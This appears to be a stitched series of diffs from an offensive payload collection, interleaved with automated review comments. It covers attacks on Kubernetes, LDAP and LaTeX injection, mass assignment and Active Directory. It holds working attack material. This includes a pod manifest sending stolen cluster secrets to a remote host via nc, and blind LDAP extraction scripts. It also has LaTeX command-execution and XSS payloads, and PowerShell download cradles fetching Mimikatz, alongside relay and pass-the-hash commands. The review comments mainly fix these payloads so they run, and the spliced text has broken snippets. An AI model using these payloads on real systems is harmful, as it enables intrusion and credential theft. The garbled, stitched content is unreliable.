True Kubernetes Volumes are typically used as shared storage or for persistent storage across restarts. These are typically mounted as ext4 filesystems and can be identified with `grep -wF "ext4" /etc/mtab`.
### Privileged Containers
Kubernetes supports a wide range of [security contexts](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) for container and pod execution. The most important of these is the "privileged" [security policy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) which makes the host node's devices available under the container's `/dev` directory. This means having access to the host's Docker socket file (allowing arbitrary container actions) in addition to the host's root disks (which can be used to escape the container entirely).
While there is no official way to check for privileged mode from *within* a container, checking if `/dev/kmsg` exists will usually suffice.
## RBAC Configuration
### Listing Secrets
An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace.
```powershell
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```
### Access Any Resource or Verb
```powershell
resources:
- '*'
verbs:
- '*'
```
### Pod Creation
Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
Then create a malicious pod.yaml file.
```yaml
apiVersion: v1
kind: Pod
metadata:
name: alpine
namespace: kube-system
spec:
containers:
- name: alpine
image: alpine
command: ["/bin/sh"]
args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
serviceAccountName: bootstrap-signer
automountServiceAccountToken: true
hostNetwork: true
```
Then `kubectl apply -f malicious-pod.yaml`
### Privilege to Use Pods/Exec
```powershell
kubectl exec -it <POD NAME> -n <PODS NAMESPACE> - sh
```
### Privilege to Get/Patch Rolebindings
The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account.
Create a malicious RoleBinging.json file.
```powershell
{
"apiVersion": "rbac.authorization.k8s.io/v1",
"kind": "RoleBinding",
"metadata": {
"name": "malicious-rolebinding",
"namespcaes": "default"
},
"roleRef": {
"apiGroup": "*",
"kind": "ClusterRole",
"name": "admin"
},
"subjects": [
{
"kind": "ServiceAccount",
"name": "sa-comp"
"namespace": "default"
}
]
}
```
```powershell
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json
curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
```
### Impersonating a Privileged Account
```powershell
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```
## Privileged Service Account Token
```powershell
$ cat /run/secrets/kubernetes.io/serviceaccount/token
$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
```
## Interesting endpoints to reach
```powershell
# List Pods
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
# List secrets
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
# List deployments
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
# List daemonsets
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
```
## API addresses that you should know
*(External network visibility)*
### cAdvisor
```powershell
curl -k https://<IP Address>:4194
```
### Insecure API server
```powershell
curl -k https://<IP Address>:8080
```
### Secure API Server
```powershell
curl -k https://<IP Address>:(8|6)443/swaggerapi
curl -k https://<IP Address>:(8|6)443/healthz
curl -k https://<IP Address>:(8|6)443/api/v1
```
### etcd API
```powershell
curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
```
### Kubelet API
```powershell
curl -k https://<IP address>:10250
curl -k https://<IP address>:10250/metrics
curl -k https://<IP address>:10250/pods
```
### kubelet (Read only)
```powershell
curl -k https://<IP Address>:10255
http://<external-IP>:10255/pods
```
## References
- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2)
- [Kubernetes Pentest Methodology Part 3 - by Or Ida on November 21, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3)
- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
- [Kubernetes Pod Privilege Escalation](https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation)
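Review bot: the RoleBinding JSON in "Privilege to Get/Patch Rolebindings" is not valid JSON and the API server would reject it: `"name": "sa-comp"` is missing its trailing comma, the metadata key `"namespcaes"` should be `"namespace"`, and `"apiGroup": "*"` should be `"rbac.authorization.k8s.io"`. File names also drift between the text and the commands: the Pod section creates `pod.yaml` but runs `kubectl apply -f malicious-pod.yaml`, and the RBAC section creates `RoleBinging.json` but posts `@malicious-RoleBinging.json` (`RoleBinding` is misspelt in both, as is `CluserRole` in the sentence above it). Smaller fixes: `kubectl exec -it <POD NAME> -n <PODS NAMESPACE> - sh` needs `--` before `sh`; the second curl in the RBAC section targets `/api/v1/namespaces/kube-system/secret` (should be `secrets`); the deployments and daemonsets URLs under "Interesting endpoints to reach" lack the closing `>` after `<master_ip`; the "kubelet (Read only)" block mixes `https://<IP Address>:10255` with `http://<external-IP>:10255/pods`, so pick one scheme; `broser-based` should be `browser-based`; and the YAML and JSON snippets, plus the RBAC `resources`/`verbs` fragment, are fenced as `powershell` (use `yaml`/`json`).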


@@ -1,6 +1,17 @@
# LDAP injection # LDAP Injection
LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy. > LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
## Summary
* [Exploitation](#exploitation)
* [Payloads](#payloads)
* [Blind Exploitation](#blind-exploitation)
* [Defaults attributes](#defaults-attributes)
* [Exploiting userPassword attribute](#exploiting-userpassword-attribute)
* [Scripts](#scripts)
* [Discover valid LDAP fields](#discover-valid-ldap-fields)
* [Special blind LDAP injection](#special-blind-ldap-injection)
## Exploitation ## Exploitation
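Review bot: the new Summary entry `* [Defaults attributes](#defaults-attributes)` should read `Default attributes`; since the anchor is derived from the heading text, rename the corresponding heading to match and update the anchor to `#default-attributes` in the same change.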
@@ -9,7 +20,7 @@ Example 1.
```sql ```sql
user = *)(uid=*))(|(uid=* user = *)(uid=*))(|(uid=*
pass = password pass = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))" query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
``` ```
Example 2 Example 2
@@ -96,9 +107,91 @@ userPassword:2.5.13.18:=\xx\xx
userPassword:2.5.13.18:=\xx\xx\xx userPassword:2.5.13.18:=\xx\xx\xx
``` ```
## Scripts
### Discover valid LDAP fields
```python
#!/usr/bin/python3
import requests
import string
fields = []
url = 'https://URL.com/'
f = open('dic', 'r') #Open the wordlists of common attributes
wordl = f.read().split('\n')
f.close()
for i in wordl:
r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
if 'TRUE CONDITION' in r.text:
fields.append(str(i))
print(fields)
```
Ref. [5][5]
### Special blind LDAP injection (without "*")
```python
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
Ref. [5][5]
```ruby
#!/usr/bin/env ruby
require 'net/http'
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
flag = ''
(0..50).each do |i|
puts("[i] Looking for number #{i}")
alphabet.each do |char|
r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
if /TRUE CONDITION/.match?(r)
flag += char
puts("[+] Flag: #{flag}")
break
end
end
end
```
By [noraj](https://github.com/noraj)
## References ## References
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/) * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/writeupecw2018admyssion/)
* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/) * [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
* [How To Manage and Use LDAP Servers with OpenLDAP Utilities](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
* [How To Configure OpenLDAP and Perform Administrative LDAP Tasks](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
* SSH key authentication via LDAP
- [How to setup LDAP server for openssh-lpk](https://openssh-ldap-pubkey.readthedocs.io/en/latest/openldap.html)
- [openssh-lpk.ldif](https://github.com/Lullabot/openldap-schema/blob/master/openssh-lpk.ldif)
- [Setting up OpenLDAP server with OpenSSH-LPK on Ubuntu 14.04](https://blog.shichao.io/2015/04/17/setup_openldap_server_with_openssh_lpk_on_ubuntu.html)
- [SSH key authentication using LDAP](https://serverfault.com/questions/653792/ssh-key-authentication-using-ldap)
- [FR] [SSH et LDAP](https://wiki.lereset.org/ateliers:serveurmail:ldap-ssh)
- [SSH Public Keys in OpenLDAP](http://pig.made-it.com/ldap-openssh.html)
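Review bot: the Ruby port of the blind script will not run to completion: it interpolates the raw payload into `URI(...)`, and characters from `alphabet` such as `"`, `{`, `}`, `^`, `[` and `]` make `URI()` raise `URI::InvalidURIError`, so the loop aborts the first time one of them is tried (the Python version gets away with it because `requests` percent-encodes most of them). Build the query with `URI.encode_www_form` or `URI.encode_www_form_component`; the server decodes it and sees the same filter. The two ports also disagree on the loop bound (`range(50)` is 50 iterations, `(0..50)` is 51), and neither the scripts nor the text say that `https://URL.com/`, `http://ctf.web`, the `dic` wordlist and `TRUE CONDITION` are placeholders the reader must replace with the target form, a wordlist path and a string that only appears in the response on a true match. `Ref. [5][5]` is a reference-style link, but no `[5]:` definition appears in this diff; if it is not defined elsewhere in the file, Markdown renders it literally, so a direct link to the write-up is safer. On the defence side, both scripts generate bursts of requests whose login field contains `*)(`, a cheap pattern to flag at the WAF or in application logs.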


@@ -1,15 +1,19 @@
# LaTex Injection # LaTex Injection
You might need to adjust injection with wrappers as `\[` or `$`.
## Read file ## Read file
```bash Read file and interpret the LaTeX code in it:
```tex
\input{/etc/passwd} \input{/etc/passwd}
\include{password} # load .tex file \include{somefile} # load .tex file (somefile.tex)
``` ```
Read single lined file Read single lined file:
```bash ```tex
\newread\file \newread\file
\openin\file=/etc/issue \openin\file=/etc/issue
\read\file to\line \read\file to\line
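Review bot: now that the block is fenced as `tex`, the trailing `# load .tex file (somefile.tex)` is no longer a comment: `#` is TeX's parameter character (catcode 6), and pasting the line as-is produces the error `You can't use 'macro parameter character #' in vertical mode`. Use `%`, TeX's comment character, e.g. `\include{somefile} % loads somefile.tex`. It is also worth saying that `\include` only works in the document body and forces a page break, whereas `\input` works anywhere, which is why the other file-read payloads on this page use `\input`.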
@@ -17,9 +21,10 @@ Read single lined file
\closein\file \closein\file
``` ```
Read multiple lined file Read multiple lined file:
```bash ```tex
\lstinputlisting{/etc/passwd}
\newread\file \newread\file
\openin\file=/etc/passwd \openin\file=/etc/passwd
\loop\unless\ifeof\file \loop\unless\ifeof\file
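Review bot: `\lstinputlisting{/etc/passwd}` is dropped into the `\newread` loop block as if it were part of the same technique, but it is a separate one with its own dependency: it comes from the `listings` package and needs `\usepackage{listings}` in the preamble, which is not available when the injection point is inside the document body. Give it its own short block with that prerequisite stated, as the `\verbatiminput` block below already does with `\usepackage{verbatim}`.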
@@ -29,47 +34,72 @@ Read multiple lined file
\closein\file \closein\file
``` ```
Read text file, keep the formatting Read text file, **without** interpreting the content, it will only paste raw file content:
```bash ```tex
\usepackage{verbatim} \usepackage{verbatim}
\verbatiminput{/etc/passwd} \verbatiminput{/etc/passwd}
``` ```
If injection point is past document header (`\usepackage` cannot be used), some control
characters can be deactivated in order to use `\input` on file containing `$`, `#`,
`_`, `&`, null bytes, ... (eg. perl scripts).
```tex
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{path_to_script.pl}
```
To bypass a blacklist try to replace one character with it's unicode hex value.
- ^^41 represents a capital A
- ^^7e represents a tilde (~) note that the e must be lower case
```tex
\lstin^^70utlisting{/etc/passwd}
```
## Write file ## Write file
```bash Write single lined file:
```tex
\newwrite\outfile \newwrite\outfile
\openout\outfile=cmd.tex \openout\outfile=cmd.tex
\write\outfile{Hello-world} \write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile \closeout\outfile
``` ```
## Command execution ## Command execution
The input of the command will be redirected to stdin, use a temp file to get it. The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
```bash ```tex
\immediate\write18{env > output} \immediate\write18{id > output}
\input{output} \input{output}
``` ```
If you get any LaTex error, consider using base64 to get the result without bad characters If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
```bash ```tex
\immediate\write18{env | base64 > test.tex} \immediate\write18{env | base64 > test.tex}
\input{text.tex} \input{text.tex}
``` ```
```bash ```tex
\input|ls|base4 \input|ls|base64
\input{|"/bin/hostname"} \input{|"/bin/hostname"}
``` ```
## Cross Site Scripting ## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
```tex
\url{javascript:alert(1)} \url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder} \href{javascript:alert(1)}{placeholder}
``` ```
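Review bot: the base64 example carries a filename mismatch over from the old version: it writes `env | base64 > test.tex` and then reads `\input{text.tex}`, so the second line inputs a file that was never created; make the two names agree. The whole `## Command execution` section also depends on a prerequisite the text never states: `\write18` and the `\input|cmd` pipe only run when shell escape is enabled (`--shell-escape` on the command line or `shell_escape=t` in `texmf.cnf`); under the default restricted mode only the commands listed in `shell_escape_commands` run, and with it disabled the line is a silent no-op. That setting is the control a defender should verify on any service that compiles user-supplied LaTeX. Two smaller points in the added text: `^^41` is TeX's double-caret notation for the character with hexadecimal code 41, not a "unicode hex value", and the lowercase requirement exists because `^^` only accepts lowercase hex digits ("it's unicode hex value" should also be "its"); and the `\catcode` block only neutralises `$`, `#`, `_` and `&`, so a file containing `\`, `{`, `}`, `%`, `^` or `~` (which is any real Perl script) will still break or be mangled, a limitation the text should state.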
@@ -80,4 +110,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) * [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)

Mass Assignment/README.md Normal file

@@ -0,0 +1,42 @@
# Mass Assignment
> A mass assignment attack is a security vulnerability that occurs when a web application automatically assigns user-supplied input values to properties or variables of a program object. This can become an issue if a user is able to modify attributes they should not have access to, like a user's permissions or an admin flag.
## Summary
* [Exploit](#exploit)
* [Labs](#labs)
* [References](#references)
## Exploit
Mass assignment vulnerabilities are most common in web applications that use Object-Relational Mapping (ORM) techniques or functions to map user input to object properties, where properties can be updated all at once instead of individually. Many popular web development frameworks such as Ruby on Rails, Django, and Laravel (PHP) offer this functionality.
For instance, consider a web application that uses an ORM and has a user object with the attributes `username`, `email`, `password`, and `isAdmin`. In a normal scenario, a user might be able to update their own username, email, and password through a form, which the server then assigns to the user object.
However, an attacker may attempt to add an `isAdmin` parameter to the incoming data like so:
```json
{
"username": "attacker",
"email": "attacker@email.com",
"password": "unsafe_password",
"isAdmin": true
}
```
If the web application is not checking which parameters are allowed to be updated in this way, it might set the `isAdmin` attribute based on the user-supplied input, giving the attacker admin privileges
## Labs
* [PentesterAcademy - Mass Assignment I](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1964)
* [PentesterAcademy - Mass Assignment II](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1922)
## References
* [Hunting for Mass Assignment - Shivam Bathla - Aug 12, 2021](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)
* [Mass Assignment Cheat Sheet - OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)
* [What is Mass Assignment? Attacks and Security Tips - Yoan MONTOYA - JUNE 15, 2023](https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/)
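Review bot: the `## Exploit` section names Rails, Django and Laravel as frameworks that offer mass assignment but never says what the safe pattern is, so a reader looking for the fix has to leave for the OWASP cheat sheet. Bind only an explicit allow-list of fields (Rails strong parameters via `permit`, a Django `ModelForm` with an explicit `fields` list, Laravel `$fillable`), or map the request onto a DTO that has no `isAdmin` property at all; a short "Mitigation" paragraph before `## Labs` would close the loop. Minor: the sentence ending "giving the attacker admin privileges" is missing its full stop, and the JSON example would read better with a line naming the request it travels in (the profile-update endpoint).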


@@ -1,714 +1,51 @@
# Active Directory Attacks # Active Directory Attacks
## Summary :warning: Content of this page has been moved to [InternalAllTheThings/active-directory](https://github.com/swisskyrepo/InternalAllTheThings/)
* [Tools](#tools) - [Active Directory - Certificate Services](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-certificate-services/)
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise) - [Active Directory - Access Controls ACL/ACE](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-acl-ace/)
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability) - [Active Directory - Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-enumerate/)
* [Open Shares](#open-shares) - [Active Directory - Group Policy Objects](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-group-policy-objects/)
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) - [Active Directory - Groups](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-groups/)
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) - [Active Directory - Linux](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-linux/)
* [Password in AD User comment](#password-in-ad-user-comment) - [Active Directory - NTDS Dumping](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-ntds-dumping/)
* [Golden Tickets](#passtheticket-golden-tickets) - [Active Directory - Read Only Domain Controller](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-rodc/)
* [Silver Tickets](#passtheticket-silver-tickets) - [Active Directory - Federation Services](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adfs-federation-services/)
* [Trust Tickets](#trust-tickets) - [Active Directory - Integrated DNS - ADIDNS](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-integrated-dns/)
* [Kerberoast](#kerberoast) - [Roasting - ASREP Roasting](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-asrep/)
* [KRB_AS_REP roasting](#krb_as_rep-roasting) - [Roasting - Kerberoasting](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-kerberoasting/)
* [Pass-the-Hash](#pass-the-hash) - [Roasting - Timeroasting](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-timeroasting/)
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [Active Directory - Tricks](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-tricks/)
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) - [Deployment - SCCM](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/deployment-sccm/)
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) - [Deployment - WSUS](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/deployment-wsus/)
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Hash - Capture and Cracking](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-capture/)
* [Trust relationship between domains](#trust-relationship-between-domains) - [Hash - OverPass-the-Hash](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-over-pass-the-hash/)
* [PrivExchange attack](#privexchange-attack) - [Hash - Pass-the-Hash](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-pass-the-hash/)
* [Password spraying](#password-spraying) - [Internal - DCOM](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-dcom/)
- [Internal - MITM and Relay](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-mitm-relay/)
## Tools - [Internal - PXE Boot Image](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-pxe-boot-image/)
- [Internal - Shares](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-shares/)
* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows) - [Kerberos - Bronze Bit](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-bronze-bit/)
* [Responder](https://github.com/SpiderLabs/Responder) - [Kerberos Delegation - Constrained Delegation](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-constrained/)
* [Mimikatz](https://github.com/gentilkiwi/mimikatz) - [Kerberos Delegation - Resource Based Constrained Delegation](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-rbcd/)
* [Ranger](https://github.com/funkandwagnalls/ranger) - [Kerberos Delegation - Unconstrained Delegation](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-unconstrained/)
* [BloodHound](https://github.com/BloodHoundAD/BloodHound) - [Kerberos - Service for User Extension](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-s4u/)
- [Kerberos - Tickets](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-tickets/)
```powershell - [Password - AD User Comment](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-comments/)
apt install bloodhound #kali - [Password - DSRM Credentials](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-dsrm-credentials/)
neo4j console - [Password - Group Policy Preferences](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-group-policy-preferences/)
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j - [Password - Pre-Created Computer Account](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-precreated-computer/)
./bloodhound - [Password - GMSA](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-read-gmsa/)
SharpHound.exe (from resources/Ingestor) - [Password - LAPS](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-read-laps/)
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 - [Password - Shadow Credentials](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-shadow-credentials/)
or - [Password - Spraying](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-spraying/)
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public - [Trust - Privileged Access Management](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-pam/)
or - [Trust - Relationship](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-relationship/)
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all - [Child Domain to Forest Compromise - SID Hijacking](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-sid-hijacking/)
``` - [Forest to Forest Compromise - Trust Ticket](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-ticket/)
- [CVE](#)
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) - [MS14-068 Checksum Validation](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/MS14-068/)
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - [NoPAC / samAccountName Spoofing](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/NoPAC/)
- [PrintNightmare](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/PrintNightmare/)
```bash - [PrivExchange](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/PrivExchange/)
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec - [ZeroLogon](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/ZeroLogon/)
crackmapexec smb -L
crackmapexec smb -M name_module -o VAR=DATA
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
crackmapexec mimikatz --server http --server-port 80
```
* [Mitm6](https://github.com/fox-it/mitm6.git)
```bash
git clone https://github.com/fox-it/mitm6.git && cd mitm6
pip install .
mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
# -wh: Server hosting WPAD file (Attackers IP)
# -t: Target (You cannot relay credentials to the same device that youre spoofing)
# -i: open an interactive shell
```
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
```powershell
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
```powershell
powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1
```
* [Ping Castle](https://github.com/vletoux/pingcastle)
```powershell
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
```
* [Kerbrute](https://github.com/ropnop/kerbrute)
```powershell
./kerbrute passwordspray -d <DOMAIN> <USERS.TXT> <PASSWORD>
```
## Most common paths to AD compromise
### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
```powershell
# remote
rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
# loc
wmic useraccount get name,sid
Administrator S-1-5-21-3415849876-833628785-5197346142-500
Guest S-1-5-21-3415849876-833628785-5197346142-501
Administrator S-1-5-21-297520375-2634728305-5197346142-500
Guest S-1-5-21-297520375-2634728305-5197346142-501
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
lambda S-1-5-21-297520375-2634728305-5197346142-1110
```
```bash
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
```
Generate a ticket with `metasploit` or `pykek`
```powershell
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD P@ssw0rd yes The Domain User password
RHOSTS 10.10.10.10 yes The target address range or CIDR identifier
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER lambda yes The Domain User
